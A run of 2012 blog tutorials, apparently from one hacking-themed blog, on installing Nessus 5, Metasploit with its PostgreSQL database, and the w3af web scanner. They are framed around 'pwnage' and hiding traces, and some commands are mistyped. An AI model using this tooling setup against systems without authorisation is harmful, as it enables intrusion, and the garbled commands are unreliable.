<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now we have curl enabled and installed
in all of its flavors (standalone and PHP) with all the necessary
underlying support it needs (thanks apt-get). In order for our system
to update and accept the changes we need to restart the apache server
one more time, like so:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 restart
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now you have cURL working, go have fun
with your new playground and the new ability to run and host all of
your favorite PHP web hacking scripts :)
</div>
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-87514704376382366912012-07-03T11:36:00.000-05:002012-07-03T11:36:10.367-05:00HOW TO INSTALL NESSUS 5 on LINUX<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
A:link { so-language: zxx }
-->
</style>
<br />
<div style="margin-bottom: 0in;">
OK, so recently I showed in you how you
can effectively setup Metasploit and today we will add one more item
to arsenal to help make Metasploit even more useful and deadly. I
will show you how to install Nessus on your Linux box, although
directions should not be too different for Windows, and when we are
done you will be able to install and configure your server as well as
customizing your own vulnerabilty scans and be well on your way to
incorporating things fully into Metasploit for ultimate pwnage.
Before we begin you need to download the Nessus Scanner, version 5
just recently released is the latest and greatest. You then need to
register for a HOME FEED which will get you a product code sent to
your email chosen for activation later (link is near top of download
page in yellow bar).
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You can find the download here:
<a href="http://www.tenable.com/products/nessus/select-your-operating-system">http://www.tenable.com/products/nessus/select-your-operating-system</a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
OK, move this to your desired location
to work with and we will get started by de-packaging the download
file. We do this using the “dpkg” command with the “-i”
argument to tell it to install the file content as needed.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo dpkg -i
Nessus-5.0.0-filename.deb</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/rnCl4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/rnCl4.jpg" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
A:link { so-language: zxx }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
The system will do the required
installation tasks for the most part, simple answer accordingly if
any prompts come up. Once completed Nessus server will be started and
we can navigate to the login page in our Browser of choice, you can
find it at either <a href="http://localhost:8834/">http://localhost:8834</a>
OR <a href="http://bt:8834/">http://bt:8834</a>. You will probably
need to accept a security warning since the certificate is self
signed...</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/DlknU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/DlknU.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
--
</style></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
</style></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
</style>Once accepted you get the welcome page
as first sign we are one our way</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8l3uL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/8l3uL.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
Now go through the necessary steps to
create a new user account for Nessus, and take note or write it down
– whatever you do to remember your logins.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Pr11K.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/Pr11K.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
Download plugins, wait for it to finish
its initializing (it finishes configruation and restarts server).
Once its done you will need to login with your new account you just
created.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/fOV5N.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/fOV5N.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
Once logged in you will see the Nessus
web panel from which all the magic happens (for the most part),
should look like this:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RhuJJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/RhuJJ.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
In o rder to get started we need to go
to the Policies tab. You will see the default Policies which are
already setup and ready to go. You can view them for reference and
use as you like, but eventually you will want to customize your own
scan settings. In order to do this we need to hit the +ADD button in
upper right.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YkV9i.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/YkV9i.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
Now we can configure our own scan with
all the settings we want as we like. The first tab is the General
settings which affect how the tool funcitons. You can define how to
handle congestion, what ports to scan, what type of scan method to
use, etc. Also, we give our Policy a name so we can identify it later
for use.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WnAiX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/WnAiX.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
Next we add any credentials we might
have on the Credentials tab. This step is optional but is suggested
if you have them as it will allow the scans to run much deeper and
with greater access. The results between a blank scan and a
credentialed scan can often times be alarming. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/18Xyf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/18Xyf.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
The next tab allow syou to define which
modules you actually want to use during the scan. Typically you will
simply use them all but in delicate situations this is where you can
go to fine tune things as needed. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Ccgdi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/Ccgdi.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-
</style></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
</style>The last tab we have is the preferences
tab. This tab covers a lot of items like adding additional
credentials, fine tuning scan settings, and other misc things like
this (check it out to see what all is available to you). The more
you put in the more you will get back as it allows for more in depth
scans to be performed.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/J9c5G.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/J9c5G.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
When you're done simply hit the SUBMIT
button in the lower right hand corner of the last tab (Preferences).
Now we have a scan policy we can use anytime going forward, but how
do we use it? In order to use it we need to now go to the SCAN tab to
setup our actual scan to run. You will need to give your scan a name
which will be used for the reports as well, also identify the IP
address to scan. The IP can be provided as a single IP, and range or
in CIDR format. You can also choose to use a file with one IP per
line which will be used to scan through – very helpful in large
environments. The policy type from the drop down will be what defines
how the scan is performed, and is what we setup a minute ago :) When
you have it setup how you like simply hit the LAUNCH SCAN button in
lower right to start the scan process.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tW16B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/tW16B.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
You can go to the REPORT tab now to
view your running scans as well as all the completed ones. You can
click on the BROWSE button up right or double-click to open any
report up to view the results of the scan. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/1Uizy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/1Uizy.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
The reports in the new v5 are really
impressive visually and make for very good reports to hand over to
others if needed following a job (use HTML output option). </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/d0TmT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/d0TmT.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
The whole framework is very user
friendly, you can double-click anywhere on the report to drill down
for more information. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dfgir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/dfgir.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
You can drill all the way down and see
the identified vulnerability, the CVE reference number, as well as a
general description of the vulnerability in most cases and possible
remediation paths to follow. In some cases you may even be lucky
enough to get a link to additional reference material. Now when we
are done we probably want to export a copy of the scans for safe
keeping, reference, and to use with other tools (especially
Metasploit). Nessus supports several file formats for the output
file. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/slygz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/slygz.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
The HTML report provides you with
everything needed to present the findings to both technical and
non-technical parties. It has pretty graphics which get lots of “oos
and ahs”. The .NBE and .NESSUS formats are probably the most useful
as they can both be imported into Metasploit's database for further
use, mainly CVE references to match to known exploits. Play around
with them and find what suits you best, I tend to export my results
in multiple formats so I have options depending on the need.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
All in all I rate this new release an
A++ in my book. This concludes our basic instroduction to the Nessus
vulnerability scanner. You should now be able to set it up properly
on your system and customize your own scans to run on targets. I will
have a follow up series coming shortly on how we can import into
Metasploit for taking things to the next level as well as how to run
scans directly from Metasploit once our policies have been defined. </div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div style="margin-bottom: 0in;">
<u><b>QUICK FINAL NOTE: </b></u>The
Nessus Server will start up on system startup. If you wish to start,
stop, or re-start the Nessus server at anytime just use this command
syntax and select your option accordingly.</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo
/et/cinit.d/nessusd start|stop|restart</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
</div>
<div style="margin-bottom: 0in;">
I
hope you have enjoyed this tutorial and until next time, Enjoy!</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-78485140269636124232012-07-03T10:17:00.000-05:002012-07-03T10:18:30.989-05:00HOW TO INSTALL METASPLOIT (on Ubuntu 11.10)<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
A:link { so-language: zxx }
-->
</style>
<br />
<div align="LEFT" style="margin-bottom: 0in;">
Today I will provide you
with a quick tutorial on how you can install Metasploit on your
Linux box so you don't have to waste time with Backtrack. Once we are
done you should have a working instance of Metasploit installed as a
service and a working PostgreSQL database to connect giving you the
full availability of all that Metasploit has to offer us. In order to
begin we first need to download the latest installer package for our
system from the main Metasploit site.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Download available here:
<a href="http://www.metasploit.com/download/">http://www.metasploit.com/download/</a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
OK, so before we run our
installer we need to first give it executable rights, we do this
through use of the “chmod” command. We simple issue the following
command which turns this file into and executable file:</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> chmod +x
metasploit-latest-installer-file.run</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once this is done we can
simply execute from console to launch the installer</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/QrERN.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/QrERN.jpg" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
A:link { so-language: zxx }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
You will need to answer a
few simple setup questions for the installer to do its thing, I
suggest allowing it to install as a Service and leaving the default
port unless you have reason to move elsewhere.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Once it is done you will
need to navigate in our browser to the login page for the new Web GUI
interface. You can find it at: <a href="https://localhost:3790/">https://localhost:3790/</a>
unless you changed the default port during setup.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Fi1Ct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/Fi1Ct.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Once exception is made you
will be redirected to the Web GUI login page where you can create a
new user account to use with the GUI. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/IPicN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/IPicN.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
When you click on Create
Account it will ask for product code. Click on the hyperlink above it
to request one. You can use <a href="http://www.guerrillamail.com/">http://www.guerrillamail.com/</a>
for a temporary email for signup if you dont want to have any traces
or your just plain bonkers paranoid. They will email you a temp
product code which you then need to use to load to get the real
product code, so you need a working email (why I like GuerrillaMail).</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/gfrfS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/gfrfS.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Enter temp code to get real
code:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/N1br1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/N1br1.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
Now activate your shit:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mF1fI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/mF1fI.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Yeah, now we legit and have
Web GUI installed.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kyfWI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/kyfWI.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Use the administrator panel
to update SW so you have all of the latest and greatest available to
use.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/OdVBH.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/OdVBH.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Once you are updated you can
start cooking with the Web GUI if you like. You can create a Project
to get started, just give it a name and a few details:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RvQ8P.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/RvQ8P.png" width="400" /></a></div>
<br />
<div align="LEFT" style="margin-bottom: 0in;">
Once project is created you
can now define all the scan options and do what you want. This
community edition is fairly limited in what it is capable of doing,
so mostly just the Discovery tab will be working in full.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/jX6OJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/jX6OJ.png" width="400" /></a></div>
<br />
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
You can use a work email to
get a product code to try the PRO version for a 1 week trial period
if you like. It is basically just point and click hacking though for
administrators from companies with money and lack of knowledge on how
to operate the underlying framework. Since I know we are all poor let
us now go set things up so we can use the more traditional MSFCONSOLE
which doesn't have any limitations for us once properly setup. We
start by dropping back to console or terminal and navigating to our
MSF installation directory “/opt/metasploit-4.x/msf3”.</div>
<div align="LEFT" style="margin-bottom: 0in;">
<b><br /></b>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> cd
/opt/metasploit-4.x/msf3/</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we update things real
quick once more to make sure our console is fully up to date in
addition to the stupid worthless WebGUI. We do this using the builtin
MSFUPDATE function. Simply run it from command line with sudo
privileges and wait a few minutes for it to do its thing.</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND</b>: sudo msfupdate</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uzdjB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/uzdjB.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we start the msfconsole
using simple command “sudo msfconsole”</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9xEzc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="http://i.imgur.com/9xEzc.png" width="320" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
</style>Now that we are updated we
can make sure our database functionality from the bundled PostgreSQL
is properly working. This is probably where almost everyone fails
when setting things up. The system comes pre-bundled with everything
needed, but poor documentation make it hard to figure things out
sometimes, mainly how to connect to the dang database. Well today I
lift the mystery :)</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
The database credentials
created upon installation are stored in a file in the /config
directory within the MSF installation folder. We can use “cat”
command to read the file contents to ensure we are using the proper
credentials to connect.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo cat
/opt/metasploit-4.1.4/config/database/yml</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HacUM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/HacUM.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
Now we can use those
credentials to connect to the Metasploit database created at startup
without any need to create new users, databases, or anything else :)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Gm2HN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/Gm2HN.png" width="400" /></a></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style>
</div>
<div align="LEFT" style="margin-bottom: 0in;">
You can simply type “HELP”
or “?” at the command prompt now and you will find that you now
have the full database commands options in addition to the standard
options. Moving forward all scans run through the Metasploit console
will be stored in our PostgreSQL database for re-use afterwards. This
brings us great advantages when working with tools like NMAP and
vulnerability scanners like Nessus and Nexspose which can be imported
directly into the database or run directly from the msfconsole.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
This concludes my
introduction to setting up standalone Metasploit instance with
working database connections. I will follow up tutorials coming in
the next week to outline how we can install Nessus and incorporate
into Metasploit as well as how to the same with Nexspose. I hope you
enjoyed this short tut and found some piece of it informative. </div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Until
next time, Enjoy!</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>SPECIAL NOTE: </b>In the past
you used to be able to configure standalone database servers but HD
has stopped the official Support for all db_driver options other than
PostgreSQL so this is your only real option these days (no more MySQL
support). You can install you own separate PostgreSQL instance and
use pgadmin3 to manage and give MSF the proper credentials to connect
this way but when everything is already bundled there is no need to
re-invent the wheel...</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-29005019582953051382012-07-02T12:01:00.000-05:002012-07-02T12:02:44.236-05:00Introduction to Web Application and Audit Framework, a.k.a. W3AF<br />
Today I am going ot give you a brief introduction to a really great open source web scanner known as the <b>Web Application and Audit Framework</b>, or<b> W3AF</b> for short. It is coded in python, has both a console and GUI version, and is capable of mapping out a target site, testing for vulnerabilities and even exploiting these vulnerabilities in some cases. I will focus on the console version and provide videos at the end for both versions. This way you will get a better understanding of the structure and how it works as the GUI works the same and is fairly easy to quickly pick-up on after stumbling through a few scans. In order to get started though you need to make sure your system meets the pre-requisites for the tool to work.<br />
<br />
<b>Pre-requisites are:</b><br />
- w3af: <a href="http://w3af.sourceforge.net/">http://w3af.sourceforge.net/</a><br />
- python 2.6+<br />
- pybloomfilters<br />
- python-dev<br />
- half a brain :p<br />
<br />
Installation is covered in the w3af user guide so I wont cover it here, works same as most of the other applications we have installed for other tutorials I have covered so far...<br />
<b><br />NOTE:</b> if you experience issues with installing bloomfilters or missing Python.h files during pre-requisite installs don't worry I had to fight them myself. The bloomfilter link is provided in the error message from W3af install script and easy enough to install. If you experience issues around missing Python.h during any gcc builds during the installation process you will need to use your package manager to install "python-dev" which will install the required python headers support for your system which solves the problems after you re-run install commands. Aside from these two issues installation follows the w3af documentation exactly and is fairly pain free.<br />
<br />
Now that you have your system pre-requisites installed you can get things going by starting the console script with the request for help options from the install folder, like so:<br />
CONSOLE Mode VIDEO Demo:<br />
./w3af_console --help<br />
<br />
You should be greeted by the w3af menu options and command prompt.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/piq5v.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/piq5v.jpg" width="400" /></a></div>
<br />
You can drop the "--help" and run without any arguments to get started, just choose console or gui based on your need (were focusing on console for now). Once you launch the console app you will drop into a w3af shell and the command prompt will change slightly. You are now in the framework, which works very similar to the other Rapid7 framework - Metasploit. The w3af framework is broken into functional sections and plugins handle the work within each section passing their results to the next in line. You need to configure your profile and/or plugins along with any target or misc items you want before running a scan. We walk through this process now starting from initial w3af console command prompt so you can better understand how it works.<br />
<br />
When you are in the w3af console mode your two best friends are going to be the "help" and "view" commands. These will display the menu for each section or list of possible config options in sub-sections. There are also a few hot keys you can use to save time and make navigation in console mode a little easier.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/k5MbV.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/k5MbV.jpg" width="400" /></a></div>
<br />
Now in order to get started we need to configure our scan options how we like them. You simply type the name of the section you wish to jump into and w3af command prompt will change indicating you have successfully jumped sections. You can then issue a new "help" or "view" command to see what is available within the new section. We can run through them in the typical order I might approach things in. First we need to set our target configuration. If you type "target" and hit enter it will take you into the target sub-section. If you type "help" you can see a listing of all command options and if you type "view" the available options for target configuration are presented. In order to set a config setting we simple need to type "set <config-setting> <enter-value>" and hit enter. You will need to do this multiple times until all items have been configured. You can use view command again when done to verify things were properly updated. If you have multiple targets or values to set for a option you can simple enter in comma separated list manner. once you are done you can simply type "back" to move back to the previous menu section to continue configuring. <br />
<div class="separator" style="clear: both; text-align: center;">
